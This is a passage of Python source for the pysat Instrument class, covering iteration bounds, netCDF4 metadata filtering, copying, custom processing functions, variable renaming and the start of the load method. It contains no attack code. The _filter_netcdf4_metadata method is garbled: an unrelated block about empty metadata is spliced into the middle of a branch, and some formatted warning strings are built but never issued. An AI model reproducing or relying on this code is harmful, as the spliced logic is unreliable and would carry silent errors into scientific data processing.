next_date = self.date + self.load_step
return self._load_data(date=next_date, inc=self.load_step)
else:
next_id = self._fid + self.load_step + 1
return self._load_data(fid=next_id, inc=self.load_step)
def _load_prev(self):
"""Load the previous days data (or file) without decrementing the date
Returns
-------
data : (pds.DataFrame or xr.Dataset)
pysat data
meta : (pysat.Meta)
pysat meta data
Note
----
Repeated calls will not decrement date/file and will produce the same
data
Uses info stored in object to either decrement the date,
or the file. Looks for self._load_by_date flag.
"""
if self._load_by_date:
prev_date = self.date - self.load_step
return self._load_data(date=prev_date, inc=self.load_step)
else:
prev_id = self._fid - self.load_step - 1
return self._load_data(fid=prev_id, inc=self.load_step)
def _set_load_parameters(self, date=None, fid=None):
""" Set the necesssary load attributes
Parameters
----------
date : (dt.datetime.date object or NoneType)
file date
fid : (int or NoneType)
filename index value
"""
# Filter supplied data so that it is only year, month, and day and
# then store as part of instrument object. Filtering is performed
# by the class property `self.date`
self.date = date
self._fid = fid
if date is not None:
year, doy = utils.time.getyrdoy(date)
self.yr = year
self.doy = doy
self._load_by_date = True
else:
self.yr = None
self.doy = None
self._load_by_date = False
def _get_var_type_code(self, coltype):
"""Determines the two-character type code for a given variable type
Parameters
----------
coltype : type or np.dtype
The type of the variable
Returns
-------
str
The variable type code for the given type
Raises
------
TypeError
When coltype is unknown
Note
----
Understands np.dtype, numpy int, uint, and float variants, and
str subclasses
"""
var_types = {np.int64: 'i8', np.int32: 'i4', np.int16: 'i2',
np.int8: 'i1', np.uint64: 'u8', np.uint32: 'u4',
np.uint16: 'u2', np.uint8: 'u1', np.float64: 'f8',
np.float32: 'f4'}
if isinstance(coltype, np.dtype):
var_type = coltype.kind + str(coltype.itemsize)
return var_type
else:
if coltype in var_types.keys():
return var_types[coltype]
elif issubclass(coltype, str):
return 'S1'
else:
raise TypeError('Unknown Variable Type' + str(coltype))
def _get_data_info(self, data):
"""Support file writing by determining data type and other options
Parameters
----------
data : pandas object
Data to be written
Returns
-------
data : pandas object
Data that was supplied, reformatted if necessary
data_type : type
Type for data values
datetime_flag : bool
True if data is np.datetime64, False otherwise
"""
# Get the data type
data_type = data.dtype
# Check for object type
if data_type != np.dtype('O'):
# Simple data, not an object
if data_type == np.dtype('<M8[ns]'):
data_type = np.int64
datetime_flag = True
else:
datetime_flag = False
else:
# We're dealing with a more complicated object. Iterate
# over elements until we hit something that is something,
# and not NaN
data_type = type(data.iloc[0])
for i in np.arange(len(data)):
if len(data.iloc[i]) > 0:
data_type = type(data.iloc[i])
if not isinstance(data_type, float) \
or (not isinstance(data_type, np.floating)):
break
datetime_flag = False
return data, data_type, datetime_flag
def _filter_netcdf4_metadata(self, mdata_dict, coltype, remove=False,
export_nan=None):
"""Filter metadata properties to be consistent with netCDF4.
Parameters
----------
mdata_dict : dict
Dictionary equivalent to Meta object info
coltype : type
Type provided by _get_data_info
remove : bool
Removes FillValue and associated parameters disallowed for strings
(default=False)
export_nan : list or NoneType
Metadata parameters allowed to be NaN (default=None)
Returns
-------
dict
Modified as needed for netCDf4
Note
----
Remove forced to True if coltype consistent with a string type
Metadata values that are NaN and not listed in export_nan are
filtered out.
"""
# Remove any metadata with a value of NaN not present in export_nan
filtered_dict = mdata_dict.copy()
for key, value in mdata_dict.items():
try:
if np.isnan(value):
if key not in export_nan:
filtered_dict.pop(key)
except TypeError:
# If a TypeError thrown, it's not NaN
pass
mdata_dict = filtered_dict
# Coerce boolean types to integers
for key in mdata_dict:
if type(mdata_dict[key]) == bool:
mdata_dict[key] = int(mdata_dict[key])
if coltype == str:
remove = True
warnings.warn('FillValue is not an acceptable '
'parameter for strings - it will be removed')
# Make sure _FillValue is the same type as the data
if '_FillValue' in mdata_dict.keys():
if remove:
mdata_dict.pop('_FillValue')
else:
if not np.can_cast(mdata_dict['_FillValue'], coltype):
if 'FieldNam' in mdata_dict:
estr = ' '.join(('FillValue for {a:s} ({b:s}) cannot',
'be safely casted to {c:s} Casting',
'anyways. This may result in',
'unexpected behavior'))
estr.format(a=mdata_dict['FieldNam'],
b=str(mdata_dict['_FillValue']),
c=coltype)
warnings.warn(estr)
else:
estr = ' '.join(('FillValue {a:s} cannot be safely',
'casted to {b:s}. Casting anyways.',
'This may result in unexpected',
'behavior'))
estr.format(a=str(mdata_dict['_FillValue']),
b=coltype)
# check if load routine actually returns meta
if self.meta.data.empty:
self.meta[self.variables] = {self.meta.labels.name: self.variables,
self.meta.labels.units:
[''] * len(self.variables)}
# Make sure FillValue is the same type as the data
if 'FillVal' in mdata_dict.keys():
if remove:
mdata_dict.pop('FillVal')
else:
mdata_dict['FillVal'] = np.array(
mdata_dict['FillVal']).astype(coltype)
return mdata_dict
# -----------------------------------------------------------------------
# Define all accessible methods
@property
def bounds(self):
"""Boundaries for iterating over instrument object by date or file.
Parameters
----------
start : datetime object, filename, or None
start of iteration, if None uses first data date.
list-like collection also accepted. (default=None)
stop : datetime object, filename, or None
stop of iteration, inclusive. If None uses last data date.
list-like collection also accepted. (default=None)
step : str, int, or None
Step size used when iterating from start to stop. Use a
Pandas frequency string ('3D', '1M') when setting bounds by date,
an integer when setting bounds by file. Defaults to a single
day/file (default='1D', 1).
width : pandas.DateOffset, int, or None
Data window used when loading data within iteration. Defaults to a
single day/file if not assigned. (default=dt.timedelta(days=1),
1)
Note
----
Both start and stop must be the same type (date, or filename) or None.
Only the year, month, and day are used for date inputs.
Examples
--------
::
import datetime as dt
import pandas as pds
import pysat
inst = pysat.Instrument(platform=platform,
name=name,
tag=tag)
start = dt.datetime(2009, 1, 1)
stop = dt.datetime(2009, 1, 31)
# Defaults to stepping by a single day and a data loading window
# of one day/file.
inst.bounds = (start, stop)
# Set bounds by file. Iterates a file at a time.
inst.bounds = ('filename1', 'filename2')
# Create a more complicated season, multiple start and stop dates.
start2 = dt.datetetime(2010,1,1)
stop2 = dt.datetime(2010,2,14)
inst.bounds = ([start, start2], [stop, stop2])
# Iterate via a non-standard step size of two days.
inst.bounds = ([start, start2], [stop, stop2], '2D')
# Load more than a single day/file at a time when iterating
inst.bounds = ([start, start2], [stop, stop2], '2D',
dt.timedelta(days=3))
"""
return (self._iter_start, self._iter_stop, self._iter_step,
self._iter_width)
@bounds.setter
def bounds(self, value=None):
# Set the bounds property. See property docstring for details
if value is None:
# User wants defaults
value = (None, None, None, None)
if len(value) < 2:
raise ValueError(' '.join(('Must supply both a start and stop',
'date/file. Supply None if you want the',
'first/last possible.')))
elif len(value) == 2:
# Includes start and stop only
self._iter_step = None
self._iter_width = None
elif len(value) == 3:
# Also includes step size
self._iter_step = value[2]
self._iter_width = None
elif len(value) == 4:
# Also includes loading window (data width)
self._iter_step = value[2]
self._iter_width = value[3]
else:
raise ValueError('Too many input arguments.')
# Pull out start and stop times now that other optional items have
# been checked out.
start = value[0]
stop = value[1]
if (start is None) and (stop is None):
# Set default using first and last file date
self._iter_start = [self.files.start_date]
self._iter_stop = [self.files.stop_date]
self._iter_type = 'date'
if self._iter_step is None:
self._iter_step = '1D'
if self._iter_width is None:
self._iter_width = dt.timedelta(days=1)
if self._iter_start[0] is not None:
# There are files. Use those dates.
ustops = [istop - self._iter_width + dt.timedelta(days=1)
for istop in self._iter_stop]
ufreq = self._iter_step
self._iter_list = utils.time.create_date_range(self._iter_start,
ustops,
freq=ufreq)
else:
# Instrument has no files
self._iter_list = []
else:
# User provided some inputs, ensure always a 1D list
starts = pysat.utils.listify(start)
stops = pysat.utils.listify(stop)
# check equal number of elements
if len(starts) != len(stops):
estr = ' '.join(('Both start and stop must have the same',
'number of elements'))
raise ValueError(estr)
# check everything is the same type
base = type(starts[0])
for lstart, lstop in zip(starts, stops):
etype = type(lstop)
check1 = not isinstance(lstart, etype)
check2 = not isinstance(lstart, base)
if check1 or check2:
# Method allows for inputs like inst.bounds = (start, None)
# and bounds will fill the None with actual start or stop.
# Allow for a Nonetype only if length is one.
if len(starts) == 1 and (start is None):
# we are good on type change, start is None, no error
break
elif len(stops) == 1 and (stop is None):
# we are good on type change, stop is None, no error
break
raise ValueError(' '.join(('Start and stop items must all',
'be of the same type')))
# set bounds based upon passed data type
if isinstance(starts[0], str) or isinstance(stops[0], str):
# one of the inputs is a string
self._iter_type = 'file'
# could be (string, None) or (None, string)
# replace None with first/last, as appropriate
if starts[0] is None:
starts = [self.files[0]]
if stops[0] is None:
stops = [self.files[-1]]
# Default step size
if self._iter_step is None:
self._iter_step = 1
# Default window size
if self._iter_width is None:
self._iter_width = 1
self._iter_list = []
for istart, istop in zip(starts, stops):
# Ensure istart begins before istop. Get the index of
# the file start/stop times from main file list.
start_idx = self.files.get_index(istart)
stop_idx = self.files.get_index(istop)
if stop_idx < start_idx:
estr = ' '.join(('Bounds must be in increasing date',
'order.', istart, 'occurs after',
istop))
raise ValueError(estr)
itemp = self.files.get_file_array([istart], [istop])
# downselect based upon step size
itemp = itemp[::self._iter_step]
# Make sure iterations don't go past last day
# get index of last in iteration list
iter_idx = self.files.get_index(itemp[-1])
# don't let loaded data go past stop bound
if iter_idx + self._iter_width - 1 > stop_idx:
i = np.ceil((self._iter_width - 1) / self._iter_step)
i = -np.int64(i)
self._iter_list.extend(itemp[:i])
else:
self._iter_list.extend(itemp)
elif isinstance(starts[0], dt.datetime) or isinstance(stops[0],
dt.datetime):
# One of the inputs is a date
self._iter_type = 'date'
if starts[0] is None:
# Start and stop dates on self.files already filtered
# to include only year, month, and day
starts = [self.files.start_date]
if stops[0] is None:
stops = [self.files.stop_date]
# Default step size
if self._iter_step is None:
self._iter_step = '1D'
# Default window size
if self._iter_width is None:
self._iter_width = dt.timedelta(days=1)
# Create list-like of dates for iteration
starts = utils.time.filter_datetime_input(starts)
stops = utils.time.filter_datetime_input(stops)
freq = self._iter_step
width = self._iter_width
# Ensure inputs are in reasonable date order
for start, stop in zip(starts, stops):
if start > stop:
estr = ' '.join(('Bounds must be set in increasing',
'date order.',
start.strftime('%d %B %Y'),
'is later than',
stop.strftime('%d %B %Y')))
raise ValueError(estr)
# account for width of load. Don't extend past bound.
ustops = [stop - width + dt.timedelta(days=1)
for stop in stops]
self._iter_list = utils.time.create_date_range(starts,
ustops,
freq=freq)
# go back to time index
self._iter_list = pds.DatetimeIndex(self._iter_list)
else:
raise ValueError(' '.join(('Input is not a known type, string',
'or datetime')))
self._iter_start = starts
self._iter_stop = stops
return
@property
def empty(self):
"""Boolean flag reflecting lack of data, True if there is no data.
"""
return self._empty()
@property
def date(self):
"""Date for loaded data."""
return self._date
@date.setter
def date(self, new_date):
# Set the date property, see property docstring for details
self._date = utils.time.filter_datetime_input(new_date)
@property
def index(self):
"""Returns time index of loaded data."""
return self._index()
@property
def variables(self):
"""Returns list of variables within loaded data."""
if self.pandas_format:
return self.data.columns
else:
return list(self.data.variables.keys())
def copy(self):
"""Deep copy of the entire Instrument object.
Returns
-------
pysat.Instrument
"""
# Copy doesn't work with module objects. Store module and files class,
# set module variable/files to `None`, make the copy, reassign the
# saved modules.
saved_module = self.inst_module
# The files/orbits class copy() not invoked with deepcopy
saved_files = self.files
saved_orbits = self.orbits
self.inst_module = None
self.files = None
self.orbits = None
# Copy non-problematic parameters
inst_copy = copy.deepcopy(self)
# Restore links to the instrument support functions module
inst_copy.inst_module = saved_module
self.inst_module = saved_module
# Reattach files and copy
inst_copy.files = saved_files.copy()
self.files = saved_files
# Reattach orbits and copy
inst_copy.orbits = saved_orbits.copy()
self.orbits = saved_orbits
# Support a copy if a user does something like,
# self.orbits.inst.copy(), or
# self.files.inst_info['inst'].copy()
if not isinstance(inst_copy, weakref.ProxyType):
inst_copy.files.inst_info['inst'] = weakref.proxy(inst_copy)
inst_copy.orbits.inst = weakref.proxy(inst_copy)
else:
inst_copy.files.inst_info['inst'] = inst_copy
inst_copy.orbits.inst = inst_copy
return inst_copy
def concat_data(self, new_data, prepend=False, **kwargs):
"""Concats new_data to self.data for xarray or pandas as needed
Parameters
----------
new_data : pds.DataFrame, xr.Dataset, or list of such objects
New data objects to be concatonated
prepend : boolean
If True, assign new data before existing data; if False append new
data (default=False)
**kwargs : dict
Optional keyword arguments passed to pds.concat or xr.concat
Note
----
For pandas, sort=False is passed along to the underlying
pandas.concat method. If sort is supplied as a keyword, the
user provided value is used instead. Recall that sort orders the
data columns, not the data values or the index.
For xarray, dim=Instrument.index.name is passed along to xarray.concat
except if the user includes a value for dim as a keyword argument.
"""
# Order the data to be concatonated in a list
if not isinstance(new_data, list):
new_data = [new_data]
if prepend:
new_data.append(self.data)
else:
new_data.insert(0, self.data)
# Retrieve the appropriate concatonation function
if self.pandas_format:
# Specifically do not sort unless otherwise specified
if 'sort' not in kwargs:
kwargs['sort'] = False
concat_func = pds.concat
else:
# Specify the dimension, if not otherwise specified
if 'dim' not in kwargs:
kwargs['dim'] = self.index.name
concat_func = xr.concat
# Assign the concatonated data to the instrument
self.data = concat_func(new_data, **kwargs)
return
def custom_attach(self, function, at_pos='end', args=[], kwargs={}):
"""Attach a function to custom processing queue.
Custom functions are applied automatically whenever `.load()`
command called.
Parameters
----------
function : string or function object
name of function or function object to be added to queue
at_pos : string or int
Accepts string 'end' or a number that will be used to determine
the insertion order if multiple custom functions are attached
to an Instrument object. (default='end').
args : list or tuple
Ordered arguments following the instrument object input that are
required by the custom function (default=[])
kwargs : dict
Dictionary of keyword arguments required by the custom function
(default={})
Note
----
Functions applied using `custom_attach` may add, modify, or use
the data within Instrument inside of the function, and so should not
return anything.
"""
# Test the positioning input
pos_list = list(np.arange(0, len(self.custom_functions), 1))
pos_list.append('end')
if at_pos not in pos_list:
logger.warning(''.join(['unknown position specified, including ',
'function at end of current list']))
at_pos = 'end'
# Convert string to function object, if necessary
if isinstance(function, str):
function = eval(function)
# If the position is 'end' or greater
if (at_pos == 'end') | (at_pos == len(self.custom_functions)):
# store function object
self.custom_functions.append(function)
self.custom_args.append(args)
self.custom_kwargs.append(kwargs)
else:
# user picked a specific location to insert
self.custom_functions.insert(at_pos, function)
self.custom_args.insert(at_pos, args)
self.custom_kwargs.insert(at_pos, kwargs)
return
def custom_apply_all(self):
""" Apply all of the custom functions to the satellite data object.
Raises
------
ValueError
Raised when function returns any value
Note
----
This method does not generally need to be invoked directly by users.
"""
if len(self.custom_functions) > 0:
for func, arg, kwarg in zip(self.custom_functions,
self.custom_args,
self.custom_kwargs):
if not self.empty:
# Custom functions do nothing or modify loaded data. Methods
# are run on Instrument object directly and any changes to
# object by the method are retained. No data may be returned
# by method itself.
null_out = func(self, *arg, **kwarg)
if null_out is not None:
raise ValueError(''.join(('Custom functions should not',
' return any information via',
' return. Information may ',
'only be propagated back by',
' modifying supplied pysat ',
'object.')))
return
def custom_clear(self):
"""Clear the custom function list.
"""
self.custom_functions = []
self.custom_args = []
self.custom_kwargs = []
return
def today(self):
"""Returns today's date (UTC), with no hour, minute, second, etc.
Returns
-------
today_utc: datetime
Today's date in UTC
"""
return utils.time.today()
def tomorrow(self):
"""Returns tomorrow's date (UTC), with no hour, minute, second, etc.
Returns
-------
datetime
Tomorrow's date in UTC
"""
return self.today() + dt.timedelta(days=1)
def yesterday(self):
"""Returns yesterday's date (UTC), with no hour, minute, second, etc.
Returns
-------
datetime
Yesterday's date in UTC
"""
return self.today() - dt.timedelta(days=1)
def next(self, verifyPad=False):
"""Manually iterate through the data loaded in Instrument object.
Bounds of iteration and iteration type (day/file) are set by
`bounds` attribute.
Parameters
----------
verifyPad : bool
Passed to `self.load()`. If True, then padded data within
the load method will be retained. (default=False)
Note
----
If there were no previous calls to load then the
first day(default)/file will be loaded.
"""
# make sure we can iterate
if len(self._iter_list) == 0:
# nothing to potentially iterate over
raise StopIteration(''.join(('File list is empty. ',
'Nothing to be done.')))
if self._iter_type == 'date':
if self.date is not None:
# data is already loaded in .data
idx, = np.where(self.date == self._iter_list)
if len(idx) == 0:
estr = ''.join(('Unable to find loaded date ',
'in the supported iteration list. ',
'Please check the Instrument bounds, ',
'`self.bounds` for supported iteration',
'ranges.'))
raise StopIteration(estr)
elif idx[-1] >= len(self._iter_list) - 1:
# gone to far!
raise StopIteration('Outside the set date boundaries.')
else:
# not going past the last day, safe to move forward
date = self._iter_list[idx[0] + 1]
end_date = date + self._iter_width
else:
# no data currently loaded, start at the beginning
date = self._iter_list[0]
end_date = date + self._iter_width
# perform load
self.load(date=date, end_date=end_date, verifyPad=verifyPad)
elif self._iter_type == 'file':
first = self.files.get_index(self._iter_list[0])
last = self.files.get_index(self._iter_list[-1])
step = self._iter_step
width = self._iter_width
if self._fid is not None:
# data already loaded in .data
if (self._fid < first) | (self._fid + step > last):
raise StopIteration('Outside the set file boundaries.')
else:
# step size already accounted for in the list of files
# get location of current file in iteration list
idx = None
fname = self.files[self._fid]
for i, name in enumerate(self._iter_list):
if name == fname:
idx = i
break
if idx is None:
estr = ''.join(('Unable to find loaded filename ',
'in the supported iteration list. ',
'Please check the Instrument bounds, ',
'`self.bounds` for supported iteration',
'ranges.'))
raise StopIteration(estr)
fname = self._iter_list[idx + 1]
else:
# no data loaded yet, start with the first file
fname = self._iter_list[0]
# load range of files at a time
# get location for second file. Note a width of 1 loads single file
nfid = self.files.get_index(fname) + width - 1
self.load(fname=fname, stop_fname=self.files[nfid],
verifyPad=verifyPad)
return
def prev(self, verifyPad=False):
"""Manually iterate backwards through the data in Instrument object.
Bounds of iteration and iteration type (day/file)
are set by `bounds` attribute.
Parameters
----------
verifyPad : bool
Passed to `self.load()`. If True, then padded data within
the load method will be retained. (default=False)
Note
----
If there were no previous calls to load then the
first day(default)/file will be loaded.
"""
# make sure we can iterate
if len(self._iter_list) == 0:
# nothing to potentially iterate over
raise StopIteration(''.join(('File list is empty. ',
'Nothing to be done.')))
if self._iter_type == 'date':
if self.date is not None:
# some data already loaded in .data
idx, = np.where(self._iter_list == self.date)
if len(idx) == 0:
estr = ''.join(('Unable to find loaded date ',
'in the supported iteration list. ',
'Please check the Instrument bounds, ',
'`self.bounds` for supported iteration',
'ranges.'))
raise StopIteration(estr)
elif idx[0] == 0:
# too far!
raise StopIteration('Outside the set date boundaries.')
else:
# not on first day, safe to move backward
date = self._iter_list[idx[0] - 1]
end_date = self._iter_list[idx[0] - 1] + self._iter_width
self.load(date=date, end_date=end_date, verifyPad=verifyPad)
else:
# no data currently loaded, start at the end
end_date = self._iter_list[-1] + self._iter_width
date = self._iter_list[-1]
self.load(date=date, end_date=end_date, verifyPad=verifyPad)
elif self._iter_type == 'file':
first = self.files.get_index(self._iter_list[0])
last = self.files.get_index(self._iter_list[-1])
step = self._iter_step
width = self._iter_width
if self._fid is not None:
if (self._fid - step < first) or (self._fid > last):
raise StopIteration('Outside the set file boundaries.')
else:
# find location of file
idx = None
fname = self.files[self._fid]
for i, name in enumerate(self._iter_list):
if name == fname:
idx = i
break
if idx is None:
estr = ''.join(('Unable to find loaded filename ',
'in the supported iteration list. ',
'Please check the Instrument bounds, ',
'`self.bounds` for supported iteration',
'ranges.'))
raise StopIteration(estr)
fname = self._iter_list[idx - 1]
else:
fname = self._iter_list[-1]
nfid = self.files.get_index(fname) + width - 1
self.load(fname=fname, stop_fname=self.files[nfid],
verifyPad=verifyPad)
return
def rename(self, var_names, lowercase_data_labels=False):
"""Renames variable within both data and metadata.
Parameters
----------
var_names : dict or other map
Existing var_names are keys, values are new var_names
lowercase_data_labels : bool
If True, the labels applied to inst.data are forced to lowercase.
The supplied case in var_names is retained within inst.meta.
Examples
--------
::
# standard renaming
new_var_names = {'old_name': 'new_name',
'old_name2':, 'new_name2'}
inst.rename(new_var_names)
If using a pandas DataFrame as the underlying data object,
to rename higher-order variables supply a modified dictionary.
Note that this rename will be invoked individually for all
times in the dataset.
::
# applies to higher-order datasets
# that are loaded into pandas
# general example
new_var_names = {'old_name': 'new_name',
'old_name2':, 'new_name2',
'col_name': {'old_ho_name': 'new_ho_name'}}
inst.rename(new_var_names)
# specific example
inst = pysat.Instrument('pysat', 'testing2D')
inst.load(2009, 1)
var_names = {'uts': 'pysat_uts',
'profiles': {'density': 'pysat_density'}}
inst.rename(var_names)
pysat supports differing case for variable labels across the
data and metadata objects attached to an Instrument. Since
metadata is case-preserving (on assignment) but case-insensitive,
the labels used for data are always valid for metadata. This
feature may be used to provide friendlier variable names within
pysat while also maintaining external format compatibility
when writing files.
::
# example with lowercase_data_labels
inst = pysat.Instrument('pysat', 'testing2D')
inst.load(2009, 1)
var_names = {'uts': 'Pysat_UTS',
'profiles': {'density': 'PYSAT_density'}}
inst.rename(var_names, lowercase_data_labels=True)
# note that 'Pysat_UTS' was applied to data as 'pysat_uts'
print(inst['pysat_uts'])
# case is retained within inst.meta, though
# data access to meta is case insensitive
print('True meta variable name is ', inst.meta['pysat_uts'].name)
# Note that the labels in meta may be used when creating a file
# thus 'Pysat_UTS' would be found in the resulting file
inst.to_netcdf4('./test.nc', preserve_meta_case=True)
# load in file and check
raw = netCDF4.Dataset('./test.nc')
print(raw.variables['Pysat_UTS'])
"""
if self.pandas_format:
# Check for standard rename variables as well as
# renaming for higher order variables
fdict = {} # filtered old variable names
hdict = {} # higher order variable names
# keys for existing higher order data labels
ho_keys = [a for a in self.meta.keys_nD()]
lo_keys = [a for a in self.meta.keys()]
# iterate, collect normal variables
# rename higher order variables
for vkey in var_names:
# original name, new name
oname, nname = vkey, var_names[vkey]
if oname not in ho_keys:
if oname in lo_keys:
# within low order (standard) variable name keys
# may be renamed directly
fdict[oname] = nname
else:
# not in standard or higher order variable name keys
estr = ' '.join((oname, ' is not',
'a known variable.'))
raise ValueError(estr)
else:
# Variable name is in higher order list
if isinstance(nname, dict):
# Changing a variable name within a higher order object
label = [k for k in nname.keys()][0]
hdict[label] = nname[label]
# ensure variable is there
if label not in self.meta[oname]['children']:
estr = ''.join((label, ' is not a known ',
'higher-order variable under ',
oname, '.'))
raise ValueError(estr)
# Check for lowercase flag
if lowercase_data_labels:
gdict = {}
gdict[label] = nname[label].lower()
else:
gdict = hdict
# Change variables for frame at each time
for i in np.arange(len(self.index)):
# within data itself
self[i, oname].rename(columns=gdict,
inplace=True)
# Change metadata, once per variable only hdict used as
# it retains user provided case
self.meta.ho_data[oname].data.rename(hdict,
inplace=True)
# Clear out dict for next loop
hdict.pop(label)
else:
# Changing the outer 'column' label
fdict[oname] = nname
# Rename regular variables, single go check for lower case data
# labels first
if lowercase_data_labels:
gdict = {}
for fkey in fdict:
gdict[fkey] = fdict[fkey].lower()
else:
gdict = fdict
# Change variable names for attached data object
self.data.rename(columns=gdict, inplace=True)
else:
# xarray renaming: account for lowercase data labels first
if lowercase_data_labels:
gdict = {}
for vkey in var_names:
gdict[vkey] = var_names[vkey].lower()
else:
gdict = var_names
self.data = self.data.rename(gdict)
# Set up dictionary for renaming metadata variables
fdict = var_names
# Update normal metadata parameters in a single go. The case must
# always be preserved in Meta object
new_fdict = {}
for fkey in fdict:
case_old = self.meta.var_case_name(fkey)
new_fdict[case_old] = fdict[fkey]
self.meta.data.rename(index=new_fdict, inplace=True)
return
def generic_meta_translator(self, input_meta):
"""Translates the metadata contained in an object into a dictionary
Parameters
----------
input_meta : Meta
The metadata object to translate
Returns
-------
dict
A dictionary of the metadata for each variable of an output file
e.g. netcdf4
"""
export_dict = {}
if self._meta_translation_table is not None:
# Create a translation table for the actual values of the meta
# labels. The instrument specific translation table only stores the
# names of the attributes that hold the various meta labels
translation_table = {}
for key in self._meta_translation_table:
translation_table[getattr(self, key)] = \
self._meta_translation_table[key]
else:
translation_table = None
# First Order Data
for key in input_meta.data.index:
if translation_table is None:
export_dict[key] = input_meta.data.loc[key].to_dict()
else:
# Translate each key if a translation is provided
export_dict[key] = {}
meta_dict = input_meta.data.loc[key].to_dict()
for orig_key in meta_dict:
if orig_key in translation_table:
for translated_key in translation_table[orig_key]:
export_dict[key][translated_key] = \
meta_dict[orig_key]
else:
export_dict[key][orig_key] = meta_dict[orig_key]
# Higher Order Data
for key in input_meta.ho_data:
if key not in export_dict:
export_dict[key] = {}
for ho_key in input_meta.ho_data[key].data.index:
new_key = '_'.join((key, ho_key))
if translation_table is None:
export_dict[new_key] = \
input_meta.ho_data[key].data.loc[ho_key].to_dict()
else:
# Translate each key if a translation is provided
export_dict[new_key] = {}
meta_dict = \
input_meta.ho_data[key].data.loc[ho_key].to_dict()
for orig_key in meta_dict:
if orig_key in translation_table:
for translated_key in translation_table[orig_key]:
export_dict[new_key][translated_key] = \
meta_dict[orig_key]
else:
export_dict[new_key][orig_key] = \
meta_dict[orig_key]
return export_dict
def load(self, yr=None, doy=None, end_yr=None, end_doy=None, date=None,
end_date=None, fname=None, stop_fname=None, verifyPad=False,
**kwargs):
"""Load instrument data into Instrument.data object.
Parameters
----------
yr : integer
Year for desired data. pysat will load all files with an
associated date between yr, doy and yr, doy + 1 (default=None)
doy : integer
Day of year for desired data. Must be present with yr input.
(default=None)
end_yr : integer
Used when loading a range of dates, from yr, doy to end_yr, end_doy
based upon the dates associated with the Instrument's files. Date
range is inclusive for yr, doy but exclusive for end_yr, end_doy.
(default=None)
end_doy : integer
Used when loading a range of dates, from yr, doy to end_yr, end_doy
based upon the dates associated with the Instrument's files. Date
range is inclusive for yr, doy but exclusive for end_yr, end_doy.
(default=None)
date : dt.datetime
Date to load data. pysat will load all files with an associated
date between date and date + 1 day (default=None)
end_date : dt.datetime
Used when loading a range of data from `date` to `end_date` based
upon the dates associated with the Instrument's files. Date range
is inclusive for date but exclusive for end_date. (default=None)
fname : str or NoneType
Filename to be loaded (default=None)
stop_fname : str or NoneType
Used when loading a range of filenames from `fname` to `stop_fname`,
inclusive. (default=None)
verifyPad : bool
If True, padding data not removed for debugging. Padding
parameters are provided at Instrument instantiation. (default=False)
**kwargs : dict
Dictionary of keywords that may be options for specific instruments.
Raises
------
TypeError
For incomplete or incorrect input
ValueError
For input incompatible with Instrument set-up
Note
----
Loads data for a chosen instrument into .data. Any functions chosen
by the user and added to the custom processing queue (.custom.attach)
are automatically applied to the data before it is available to
user in .data.
A mixed combination of `.load()` keywords such as `yr` and `date` are
not allowed.
Note
-----
`end` kwargs have exclusive ranges (stop before the condition is
reached), while `stop` kwargs have inclusive ranges (stop once the
condition is reached).
Examples
--------
::
import datetime as dt
import pysat
inst = pysat.Instrument('pysat', 'testing')
# load a single day by year and day of year
inst.load(2009, 1)
# load a single day by date
date = dt.datetime(2009, 1, 1)
inst.load(date=date)
# load a single file, first file in this example
inst.load(fname=inst.files[0])
# load a range of days, data between
# Jan. 1st (inclusive) - Jan. 3rd (exclusive)
inst.load(2009, 1, 2009, 3)
# same procedure using datetimes
date = dt.datetime(2009, 1, 1)
end_date = dt.datetime(2009, 1, 3)
inst.load(date=date, end_date=end_date)
# same procedure using filenames
# note the change in index due to inclusive slicing on filenames!
inst.load(fname=inst.files[0], stop_fname=inst.files[1])
"""
# Add the load kwargs from initialization those provided on input
for lkey in self.kwargs['load'].keys():
# Only use the initialized kwargs if a request hasn't been
# made to alter it in the method call
if lkey not in kwargs.keys():
kwargs[lkey] = self.kwargs['load'][lkey]
# Set options used by loading routine based upon user input
if (yr is not None) and (doy is not None):
if doy < 1 or (doy > 366):
estr = ''.join(('Day of year (doy) is only valid between and ',
'including 1-366.'))
raise ValueError(estr)
# Verify arguments make sense, in context
_check_load_arguments_none([fname, stop_fname, date, end_date],
raise_error=True)
# Convert yr/doy to a date
date = dt.datetime.strptime("{:.0f} {:.0f}".format(yr, doy),
"%Y %j")
self._set_load_parameters(date=date, fid=None)
if (end_yr is not None) and (end_doy is not None):
if end_doy < 1 or (end_doy > 366):
estr = ''.join(('Day of year (end_doy) is only valid ',
'between and including 1-366.'))
raise ValueError(estr)
end_date = dt.datetime.strptime(
"{:.0f} {:.0f}".format(end_yr, end_doy), "%Y %j")
self.load_step = end_date - date
elif (end_yr is not None) or (end_doy is not None):
estr = ''.join(('Both end_yr and end_doy must be set, ',
'or neither.'))
raise ValueError(estr)
else:
# increment end by a day if none supplied
self.load_step = dt.timedelta(days=1)
curr = self.date
elif date is not None:
# Verify arguments make sense, in context
_check_load_arguments_none([fname, stop_fname, yr, doy, end_yr,
end_doy], raise_error=True)
# Ensure date portion from user is only year, month, day
self._set_load_parameters(date=date, fid=None)
date = utils.time.filter_datetime_input(date)
# Increment after determining the desired step size
if end_date is not None:
# Support loading a range of dates
self.load_step = end_date - date
else:
# Defaults to single day load
self.load_step = dt.timedelta(days=1)
curr = date
elif fname is not None:
# Verify arguments make sense, in context
_check_load_arguments_none([yr, doy, end_yr, end_doy, date,
end_date], raise_error=True)
# Date will have to be set later by looking at the data
self._set_load_parameters(date=None,
fid=self.files.get_index(fname))
# Check for loading by file range
if stop_fname is not None:
# Get index for both files so the delta may be computed
idx1 = self.files.get_index(fname)
idx2 = self.files.get_index(stop_fname)
diff = idx2 - idx1
if diff < 0:
estr = ''.join(('`stop_fname` must occur at a later date ',
'than `fname`. Swapping filename inputs ',
'will resolve the error.'))
raise ValueError(estr)
else:
self.load_step = diff
else:
# Increment one file at a time
self.load_step = 0
curr = self._fid.copy()
elif _check_load_arguments_none([yr, doy, end_yr, end_doy, date,
end_date, fname, stop_fname]):
# Empty call, treat as if all data requested
if self.multi_file_day:
estr = ''.join(('`load()` is not supported with multi_file_day',
'=True.'))
raise ValueError(estr)
if self.pad is not None:
estr = ' '.join(('`load()` is not supported with data padding',
'enabled.'))
raise ValueError(estr)
date = self.files.files.index[0]
end_date = self.files.files.index[-1] + dt.timedelta(days=1)
self._set_load_parameters(date=date, fid=None)
curr = date
self.load_step = end_date - date
else:
estr = 'Unknown or incomplete input combination.'
raise TypeError(estr)
self.orbits._reset()
# If `pad` or `multi_file_day` is True, need to load three days/files
loop_pad = self.pad if self.pad is not None \
else dt.timedelta(seconds=0)
# Check for constiency between loading range and data padding, if any
if self.pad is not None:
if self._load_by_date:
